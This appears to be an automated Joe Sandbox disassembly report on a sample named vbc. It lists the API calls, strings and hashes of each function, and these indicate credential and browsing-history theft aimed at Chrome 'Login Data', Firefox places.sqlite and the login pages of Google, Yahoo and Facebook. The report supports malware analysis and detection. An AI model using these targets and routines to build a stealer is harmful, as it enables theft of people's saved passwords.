                                                                • Part of subcall function 00409657: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,80000001,?,?,?,?,00000000,?), ref: 004096F5
                                                                • Part of subcall function 00409657: _wcsupr.MSVCRT ref: 0040970F
                                                                • Part of subcall function 00409657: memset.MSVCRT ref: 0040975E
                                                                • Part of subcall function 00409657: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,80000001,80000001,?,000000FF,?,?,?,?,00000000), ref: 00409789
                                                                • Part of subcall function 004038C4: LoadLibraryW.KERNEL32(advapi32.dll,?,00409AAA,?,https://login.yahoo.com/config/login,00000000,http://www.facebook.com/,00000000,https://www.google.com/accounts/servicelogin,00000000,?,00000000,?,0041018E,?,?), ref: 004038CF
                                                                • Part of subcall function 004038C4: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004038E3
                                                                • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 004038EF
                                                                • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 004038FB
                                                                • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00403907
                                                                • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptHashData), ref: 00403913
                                                                • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 0040391F
                                                              • _wcslwr.MSVCRT ref: 00409AFC
                                                              • wcslen.MSVCRT ref: 00409B11
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$freememset$CacheEntryEnumFindValuewcschr$ErrorFirstLastLibraryLoadNext_wcslwr_wcsuprwcslen
                                                              • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                              • API String ID: 4091582287-4196376884
                                                              • Opcode ID: 3dd2327b6272305899ca924f4fa588c8789c804827c02355519b96a796539c20
                                                              • Instruction ID: 093a45ac9553ae88d2071121675ee446b985e814abadd75c8d2b77a0ae050712
                                                              • Opcode Fuzzy Hash: 3dd2327b6272305899ca924f4fa588c8789c804827c02355519b96a796539c20
                                                              • Instruction Fuzzy Hash: F731D872A1015466CB20BB6ACC4599F77A8AF80344B25087AF804B72C3CBBCEE45D699
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A034
                                                              • wcscpy.MSVCRT ref: 0040A076
                                                                • Part of subcall function 0040A4E7: memset.MSVCRT ref: 0040A4FA
                                                                • Part of subcall function 0040A4E7: _itow.MSVCRT ref: 0040A508
                                                              • wcslen.MSVCRT ref: 0040A094
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A0A2
                                                              • LoadStringW.USER32(00000000,00000007,?,?), ref: 0040A0CD
                                                              • memcpy.MSVCRT ref: 0040A10D
                                                                • Part of subcall function 00409F53: ??2@YAPAXI@Z.MSVCRT ref: 00409F8D
                                                                • Part of subcall function 00409F53: ??2@YAPAXI@Z.MSVCRT ref: 00409FAB
                                                                • Part of subcall function 00409F53: ??2@YAPAXI@Z.MSVCRT ref: 00409FC9
                                                                • Part of subcall function 00409F53: ??2@YAPAXI@Z.MSVCRT ref: 00409FE7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                              • String ID: strings
                                                              • API String ID: 3166385802-3030018805
                                                              • Opcode ID: 87213f91dec3db501add7610991c2df7427240ace99253c04b166c5a9059b18a
                                                              • Instruction ID: f88dad89c8a087f2027bd78e20ebd55682c2f8a720c3c381d0e8595ecd4ac891
                                                              • Opcode Fuzzy Hash: 87213f91dec3db501add7610991c2df7427240ace99253c04b166c5a9059b18a
                                                              • Instruction Fuzzy Hash: 84419A792003059BD7149F18EC91F323365F76430AB99053AE802A73B2DB79EC22CB1E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                              • String ID: sysdatetimepick32
                                                              • API String ID: 1028950076-4169760276
                                                              • Opcode ID: 690b26e669973beaba76962047fb40553a53b69d8850747cc34062e580a6b82a
                                                              • Instruction ID: 9d6a1000cc6d846fb7caa7b95204278ebeb8f13d5a9664e287c5e204bace7976
                                                              • Opcode Fuzzy Hash: 690b26e669973beaba76962047fb40553a53b69d8850747cc34062e580a6b82a
                                                              • Instruction Fuzzy Hash: E21177325002197AEB24EB91DD4AE9F77BCEF04750F4040B6F508E1192E7745A51CB69
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID: -journal$-wal
                                                              • API String ID: 438689982-2894717839
                                                              • Opcode ID: 3fb32538101a96232d471ca328e00ad1292916094483904f8e7d4fc59e84f921
                                                              • Instruction ID: 551b55634523189e5c53bd135c739114fe40c1c2f7e89174430398bb56853e76
                                                              • Opcode Fuzzy Hash: 3fb32538101a96232d471ca328e00ad1292916094483904f8e7d4fc59e84f921
                                                              • Instruction Fuzzy Hash: 54A1DEB1A00606BFDB14CFA4C8517DEBBB0BF04314F14856EE468D7381D778AA95CB99
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetDlgItem.USER32 ref: 00404DE0
                                                              • GetDlgItem.USER32 ref: 00404DF3
                                                              • GetDlgItem.USER32 ref: 00404E08
                                                              • GetDlgItem.USER32 ref: 00404E20
                                                              • EndDialog.USER32(?,00000002), ref: 00404E3C
                                                              • EndDialog.USER32(?,00000001), ref: 00404E51
                                                                • Part of subcall function 00404AFB: GetDlgItem.USER32 ref: 00404B08
                                                                • Part of subcall function 00404AFB: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00404B1D
                                                              • SendDlgItemMessageW.USER32 ref: 00404E69
                                                              • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00404F7A
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Item$Dialog$MessageSend
                                                              • String ID:
                                                              • API String ID: 3975816621-0
                                                              • Opcode ID: 9463777c25d7b60e80699a536a719800608f97c85c6655884db1f8f9bc34b99a
                                                              • Instruction ID: 9cc36a3a9081561078e880a2f522ad53539937229c5c78969c314d16862aa257
                                                              • Opcode Fuzzy Hash: 9463777c25d7b60e80699a536a719800608f97c85c6655884db1f8f9bc34b99a
                                                              • Instruction Fuzzy Hash: DE61D570100705ABDB31AF25C885A2A73B9FF90724F04C63EF615A66E1D778ED50CB99
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _wcsicmp.MSVCRT ref: 00441E61
                                                              • _wcsicmp.MSVCRT ref: 00441E76
                                                              • _wcsicmp.MSVCRT ref: 00441E8B
                                                                • Part of subcall function 00407278: wcslen.MSVCRT ref: 00407287
                                                                • Part of subcall function 00407278: wcslen.MSVCRT ref: 00407291
                                                                • Part of subcall function 00407278: _memicmp.MSVCRT ref: 004072AC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _wcsicmp$wcslen$_memicmp
                                                              • String ID: .save$http://$https://$log profile$signIn
                                                              • API String ID: 1214746602-2708368587
                                                              • Opcode ID: 7c97f00c0957198ec044a334814b20feb48abd6bee8cf84da93a3bd7193c5eb8
                                                              • Instruction ID: 7a979a8a07820355720b76b8412d60638824142cd7e99aea4044fab4cdb489ca
                                                              • Opcode Fuzzy Hash: 7c97f00c0957198ec044a334814b20feb48abd6bee8cf84da93a3bd7193c5eb8
                                                              • Instruction Fuzzy Hash: A34146755487014AF7309A65898177773E8CB04329F308A2FF86BE26E2EB7CB4C6551E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                              • String ID:
                                                              • API String ID: 2313361498-0
                                                              • Opcode ID: 58df84c56ee7197fd0bb9a99faf407f91de646a6cfcc7c0d6ea8c461c9046618
                                                              • Instruction ID: ba4bb41810d6ea78f7103a52efe52e464eccc4a9d5620aafabcd38e7c3fa5a1e
                                                              • Opcode Fuzzy Hash: 58df84c56ee7197fd0bb9a99faf407f91de646a6cfcc7c0d6ea8c461c9046618
                                                              • Instruction Fuzzy Hash: 2331D3B1501601BFDB24AF69D94692AF7B8FF04304B10813EF145EB291D778EC90CB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: wcslen$memset$wcscatwcscpy
                                                              • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                              • API String ID: 2617415026-2114579845
                                                              • Opcode ID: e54539b3b58dd2da5a6c4123a214e8ac72a27d1fffcd32f3667f0866b1f0f7c1
                                                              • Instruction ID: 077c1189ed55963ee46c09665a9aee7869ceb3b17950e6b23e47196ee9b08e55
                                                              • Opcode Fuzzy Hash: e54539b3b58dd2da5a6c4123a214e8ac72a27d1fffcd32f3667f0866b1f0f7c1
                                                              • Instruction Fuzzy Hash: 0B21D972A4411D66E710E651DC85DDF73ACAF14354F5008BFF505E2082FAB89F844A6D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetClientRect.USER32 ref: 0040D0E2
                                                              • GetWindowRect.USER32 ref: 0040D0F8
                                                              • GetWindowRect.USER32 ref: 0040D10B
                                                              • BeginDeferWindowPos.USER32 ref: 0040D128
                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040D145
                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040D165
                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040D18C
                                                              • EndDeferWindowPos.USER32(?), ref: 0040D195
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Window$Defer$Rect$BeginClient
                                                              • String ID:
                                                              • API String ID: 2126104762-0
                                                              • Opcode ID: 3e059de2c2a39fa097f99da28ed46862c9af8e23a81d8ce39be14bc790b9e9d0
                                                              • Instruction ID: 1b30ad45943261d114c7945feb8e2d934b1f0a15928f611d2c59e033839f0f44
                                                              • Opcode Fuzzy Hash: 3e059de2c2a39fa097f99da28ed46862c9af8e23a81d8ce39be14bc790b9e9d0
                                                              • Instruction Fuzzy Hash: 5F21D875900209FFDB11DFA8CD89FEEBBB9FB48701F104164F655A2160C771AA519B24
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • EmptyClipboard.USER32(?,?,0040D79F,-00000210), ref: 00407303
                                                              • wcslen.MSVCRT ref: 00407310
                                                              • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,0040D79F,-00000210), ref: 00407320
                                                              • GlobalLock.KERNEL32 ref: 0040732D
                                                              • memcpy.MSVCRT ref: 00407336
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0040733F
                                                              • SetClipboardData.USER32 ref: 00407348
                                                              • CloseClipboard.USER32 ref: 00407358
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                              • String ID:
                                                              • API String ID: 1213725291-0
                                                              • Opcode ID: 5ed3c7ed2292a9e609788bd9d251ea61b7faa26044294d95fe65c060bebd8173
                                                              • Instruction ID: e9f640a6ba64593c4f3b5e3a0a2b414f675f529f5a9edaa6aa7e0ad5043136ba
                                                              • Opcode Fuzzy Hash: 5ed3c7ed2292a9e609788bd9d251ea61b7faa26044294d95fe65c060bebd8173
                                                              • Instruction Fuzzy Hash: 14F0B43B5002187BD2102FE5AC4DE1B772CEB86F97B050179FA09D2251DE749E0486B9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                              • API String ID: 3510742995-2641926074
                                                              • Opcode ID: 7724ca89a1b811e8660b33147d09bdc9b89acde94b365f7ef47b73237fc331cc
                                                              • Instruction ID: 3c8b5220aebea45aa68cfe54a9ecef019ebf38e5b75abdf02c998a5d3c6681b4
                                                              • Opcode Fuzzy Hash: 7724ca89a1b811e8660b33147d09bdc9b89acde94b365f7ef47b73237fc331cc
                                                              • Instruction Fuzzy Hash: 8E71D4B1600301BFF310AF16DCC1A6ABB98BB45318F14452FF459DB252D7B9A8D18B99
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetDlgItem.USER32 ref: 00404BDE
                                                              • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00404BF7
                                                              • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00404C04
                                                              • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00404C10
                                                              • memset.MSVCRT ref: 00404C74
                                                              • SendMessageW.USER32(?,0000105F,?,?), ref: 00404CA9
                                                              • SetFocus.USER32(?), ref: 00404D2F
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessageSend$FocusItemmemset
                                                              • String ID:
                                                              • API String ID: 4281309102-0
                                                              • Opcode ID: b5c774997c69c828c2af66cc8dd4e73b805abc013e05c1adb9cb4e53f9af2a7c
                                                              • Instruction ID: e15596ac8dd535375262745d85448c61c7cc278dece76afc2af43b7580886122
                                                              • Opcode Fuzzy Hash: b5c774997c69c828c2af66cc8dd4e73b805abc013e05c1adb9cb4e53f9af2a7c
                                                              • Instruction Fuzzy Hash: 8B417C70901219BBDB20DF95CD85DAFBFB8FF08755F10406AF509A6291D3749E40CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00402778: free.MSVCRT(00000000,0040E508,?,?,?,?,?,/deleteregkey,/savelangfile,?,?), ref: 0040277F
                                                                • Part of subcall function 00410168: memset.MSVCRT ref: 004101DA
                                                                • Part of subcall function 00410168: wcsrchr.MSVCRT ref: 004101F2
                                                                • Part of subcall function 00410168: memset.MSVCRT ref: 004102D9
                                                                • Part of subcall function 0040FF51: SetCurrentDirectoryW.KERNEL32(?,?,?,00403292,?), ref: 0040FF9E
                                                              • memset.MSVCRT ref: 0040330A
                                                              • memcpy.MSVCRT ref: 0040331C
                                                              • wcscmp.MSVCRT ref: 00403348
                                                              • _wcsicmp.MSVCRT ref: 00403385
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memset$CurrentDirectory_wcsicmpfreememcpywcscmpwcsrchr
                                                              • String ID: $J/@
                                                              • API String ID: 1763786148-830378395
                                                              • Opcode ID: 3e2635990ef3ae62cb2be14a81d094d65f482a135f1bd9a19b0151f057080487
                                                              • Instruction ID: 978c6ac20941b4c482f16f8c8dbf1af5ea5d331337d981433e161efedc4cfbbc
                                                              • Opcode Fuzzy Hash: 3e2635990ef3ae62cb2be14a81d094d65f482a135f1bd9a19b0151f057080487
                                                              • Instruction Fuzzy Hash: 36416B71A083819AD730DF61C945A9BB7E8AF85315F004C3FE88D93681EB7896498B5B
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
                                                                • Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192
                                                              • wcscat.MSVCRT ref: 0040BE5B
                                                              • _snwprintf.MSVCRT ref: 0040BE82
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileWrite_snwprintfwcscatwcslen
                                                              • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                              • API String ID: 2451617256-4153097237
                                                              • Opcode ID: 69f2f7e6d8aec51d3960e337bc25a82fe45133c58c4b8b76eb8eb5bfe9207b33
                                                              • Instruction ID: be6843ca6d8e3427859c99e4dc5891dee3dff4c22b8a3cb8274265ecf8740657
                                                              • Opcode Fuzzy Hash: 69f2f7e6d8aec51d3960e337bc25a82fe45133c58c4b8b76eb8eb5bfe9207b33
                                                              • Instruction Fuzzy Hash: BC31A031900208EFDF04AF55CC86EEE7B75FF44320F10416AE905AB1E2DB75AA51DB98
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 0040F026: memset.MSVCRT ref: 0040F042
                                                                • Part of subcall function 0040F026: memset.MSVCRT ref: 0040F057
                                                                • Part of subcall function 0040F026: wcscat.MSVCRT ref: 0040F080
                                                                • Part of subcall function 0040F026: wcscat.MSVCRT ref: 0040F0A9
                                                              • memset.MSVCRT ref: 0040EE42
                                                              • wcslen.MSVCRT ref: 0040EE59
                                                              • wcslen.MSVCRT ref: 0040EE61
                                                              • wcslen.MSVCRT ref: 0040EEBC
                                                              • wcslen.MSVCRT ref: 0040EECA
                                                                • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
                                                                • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: wcslen$memsetwcscat$wcscpy
                                                              • String ID: history.dat$places.sqlite
                                                              • API String ID: 2541527827-467022611
                                                              • Opcode ID: 80b1840165f85e79b792a4354befcf2dd23f8b0ca1889241a8ddd39d2fd2ed7d
                                                              • Instruction ID: 5a7552f2f2193819142f663f69cd0b376b18013dc8e05bcebec127321fadfdaa
                                                              • Opcode Fuzzy Hash: 80b1840165f85e79b792a4354befcf2dd23f8b0ca1889241a8ddd39d2fd2ed7d
                                                              • Instruction Fuzzy Hash: AD315232D0411DAADF10EBA6D845ACDB3B8AF00319F6048BBE514F21C1E77CAA45CF59
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: wcslen$memsetwcscatwcscpy
                                                              • String ID: Login Data$Web Data
                                                              • API String ID: 3932597654-4228647177
                                                              • Opcode ID: 350975586496b093848a9f674fd33517dd62bead458e0c7f943732b3c3b83fa5
                                                              • Instruction ID: 391ffb8f75831278f4964df5f57522d74f6eb7522eeef9a3bb7e860aca09f0fd
                                                              • Opcode Fuzzy Hash: 350975586496b093848a9f674fd33517dd62bead458e0c7f943732b3c3b83fa5
                                                              • Instruction Fuzzy Hash: 3621B83294411C7BDB10AB55DC89ACA73ACAF10368F10487BF418E6181EBF9AEC48A5C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ItemMenu$CountInfomemsetwcschr
                                                              • String ID: 0$6
                                                              • API String ID: 2029023288-3849865405
                                                              • Opcode ID: 5536c3878cefa137b9e834622b73aa06c1352d4f7dca5f5f14b9808a57972f50
                                                              • Instruction ID: 6379b183058c7bfcb2c9996af6a46f5bf8fbaffb9494aead0661b6c96fd4ce8b
                                                              • Opcode Fuzzy Hash: 5536c3878cefa137b9e834622b73aa06c1352d4f7dca5f5f14b9808a57972f50
                                                              • Instruction Fuzzy Hash: FF219A72505340ABD721DF55C84599BB7F8FB84745F044A3FFA84A2280E7B6CA10CB9A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: wcscat$_snwprintfmemset
                                                              • String ID: %2.2X
                                                              • API String ID: 2521778956-791839006
                                                              • Opcode ID: 23fbd524af4de12edaef0e362b86099d5f7adf1057b4181ed4aaf7bf29872c53
                                                              • Instruction ID: ec6d441468c88601e944e5005585d56a697b1d5e2a610cd326798869af21cd90
                                                              • Opcode Fuzzy Hash: 23fbd524af4de12edaef0e362b86099d5f7adf1057b4181ed4aaf7bf29872c53
                                                              • Instruction Fuzzy Hash: 0F012D72E4431575F720AB519C46BBF73A89F40B19F10407FFC14A50C2EABCEA444A99
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • wcscpy.MSVCRT ref: 00441B9B
                                                              • wcscat.MSVCRT ref: 00441BAA
                                                              • wcscat.MSVCRT ref: 00441BBB
                                                              • wcscat.MSVCRT ref: 00441BCA
                                                              • VerQueryValueW.VERSION(?,?,00000000,?), ref: 00441BE4
                                                                • Part of subcall function 00407447: wcslen.MSVCRT ref: 0040744E
                                                                • Part of subcall function 00407447: memcpy.MSVCRT ref: 00407464
                                                                • Part of subcall function 00407511: lstrcpyW.KERNEL32 ref: 00407526
                                                                • Part of subcall function 00407511: lstrlenW.KERNEL32(?), ref: 0040752D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                              • String ID: \StringFileInfo\
                                                              • API String ID: 393120378-2245444037
                                                              • Opcode ID: cb6593bce41ce7101ed3919308bda3c7e7c8e8e4aeb4a4d700e0b9c8d6b6edb1
                                                              • Instruction ID: a565dbaf5ef1236623e3a457584e7ee1bc303587053621a732091bcd91b9d386
                                                              • Opcode Fuzzy Hash: cb6593bce41ce7101ed3919308bda3c7e7c8e8e4aeb4a4d700e0b9c8d6b6edb1
                                                              • Instruction Fuzzy Hash: 27017C7290020CB6EF51EAA1CD45EDF77BCAF04308F4005A7B514E2052EB78DB86AB59
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _snwprintfwcscpy
                                                              • String ID: dialog_%d$general$menu_%d$strings
                                                              • API String ID: 999028693-502967061
                                                              • Opcode ID: 8becf3e9218155cd2e90e25ed978c4695a92d6ded04a6fa8cdd08c494461b467
                                                              • Instruction ID: 8e174b2d8d79018ad6e296a97c01706163ed31911536b8ede193c50f01e1bc5f
                                                              • Opcode Fuzzy Hash: 8becf3e9218155cd2e90e25ed978c4695a92d6ded04a6fa8cdd08c494461b467
                                                              • Instruction Fuzzy Hash: CBE0B679A8830079F96025861E4BB2E61508774F59FB0886FF50AB05D1E9FE95A8710F
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
